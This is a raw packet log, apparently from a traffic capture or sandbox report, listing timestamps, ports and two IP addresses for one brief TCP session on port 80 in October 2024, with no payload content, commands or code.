Oct 27, 2024 12:13:18.459135056 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.459180117 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.459216118 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.459407091 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.459458113 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.459460020 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.502875090 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.538420916 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.538459063 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.538496017 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.538523912 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.538558006 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.538594007 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.538613081 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.575587988 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.575612068 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.575628996 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.575706005 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.575726986 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.575849056 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.575865030 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.575870037 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.575870037 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.575881004 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.575911999 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.576179028 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.576235056 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.576236963 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.576265097 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.576319933 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.576323032 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.576354980 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.576400995 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.576453924 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.576539993 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.576575041 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.576591015 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.576793909 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.576829910 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.576844931 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.576884031 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.576920033 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.576931953 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.577121973 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.577176094 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.577395916 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.577430964 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.577466965 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.577482939 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.577622890 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.577675104 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.577699900 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.577754974 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.577804089 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.577877045 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.577910900 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.577963114 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.620812893 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.620866060 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.620903969 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.620995998 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.657151937 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.657202959 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.657242060 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.657309055 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.657309055 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.657356977 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.657396078 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.657429934 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.657568932 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.694334984 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.694380999 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.694442987 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.694463968 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.694482088 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.694515944 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.694536924 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.694577932 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.694741011 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.694936037 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.694992065 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.695028067 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.695040941 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.695185900 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.695220947 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.695235014 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.695255995 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.695302010 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.695456982 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.695580006 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.695617914 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.695630074 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.695758104 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.695806026 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.695847988 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.695882082 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.695918083 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.695929050 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.695954084 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.696001053 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.696187019 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.696311951 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.696360111 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.696366072 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.696400881 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.696435928 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.696449041 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.696679115 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.696712017 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.696723938 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.696752071 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.696782112 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.696798086 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.737205029 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.739001036 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.739058971 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.739097118 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.739115953 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.739135027 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.739178896 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.775695086 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.775818110 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.775855064 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.775865078 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.813266993 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.813313007 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.813325882 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.813352108 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.813402891 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.813411951 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.813447952 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.813483000 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.813494921 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.813518047 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.813555002 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.813561916 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.813587904 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.813622952 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.813633919 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.813659906 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.813709974 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.813806057 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.813839912 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.813874960 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.813884974 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.813909054 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.813955069 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.813958883 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.813992977 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.814029932 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.814037085 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.814351082 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.814399004 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.814407110 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.814488888 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.814523935 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.814538002 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.814577103 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.814625978 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.814660072 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.814694881 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.814743042 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.814810038 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.814846039 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.814893007 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.815398932 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.815454006 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.815490961 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.815502882 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.815526962 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.815562963 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.815572023 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.815598965 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.815638065 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.815666914 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.815773964 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.815773964 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.857839108 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.857929945 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.857969046 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.857989073 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.858006954 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.858059883 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.895503044 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.895556927 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.895596981 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.895602942 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.931778908 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.931802988 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.931837082 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.931849003 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.931885958 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.931905985 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.931943893 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.931991100 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.932029009 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.932065010 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.932100058 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.932113886 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.932135105 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.932168007 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.932178020 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.932208061 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.932243109 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.932251930 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.932291985 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.932322025 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.932337046 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.932435989 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.932471037 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.932485104 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.932506084 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.932550907 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.932635069 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.932785988 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.932821989 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.932833910 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.932935953 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.932971001 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.932982922 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.933005095 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.933120966 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.933264971 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.933321953 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.933362007 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.933367968 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.933584929 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.933633089 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.933645010 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.933669090 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.933703899 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.933713913 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.933912039 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.933960915 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.934180021 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.934216976 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.934251070 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.934279919 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.934284925 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.934341908 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.976779938 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.976805925 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.976824045 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.976841927 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.976851940 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.976861000 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.976886034 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.013219118 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.013313055 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.013360023 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.013379097 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.013422012 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.052154064 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.052176952 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.052253008 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.052273989 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.052309036 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.052345037 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.052364111 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.052382946 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.052421093 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.052436113 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.052454948 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.052505016 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.052565098 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.052622080 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.052658081 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.052675009 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.052691936 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.052726984 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.052743912 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.052762985 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.052812099 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.052817106 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.052861929 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.052910089 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.052993059 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.053029060 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.053067923 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.053078890 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.053081036 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.053113937 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.053131104 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.053148031 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.053184032 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.053200006 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.053916931 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.053991079 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.054024935 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.054028034 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.054063082 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.054075956 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.054099083 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.054135084 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.054147959 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.054183960 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.054229021 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.054303885 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.054342031 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.054388046 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.092238903 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.092381954 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.092438936 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.095201015 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.095257998 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.095293999 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.095305920 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.095468044 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.095518112 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.095531940 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.095551968 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.095805883 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.131918907 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.131975889 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.132010937 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.132056952 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.169228077 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.169280052 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.169349909 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.169384956 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.169428110 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.169583082 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.170403004 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.170464039 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.170479059 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.170516968 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.170564890 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.170572042 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.170608997 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.170643091 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.170653105 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.170696020 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.170742035 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.170814991 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.170862913 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.170897961 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.170907974 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:19.170933962 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.170969963 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:19.170979977 CET	49712	80	192.168.2.5	185.215.113.16
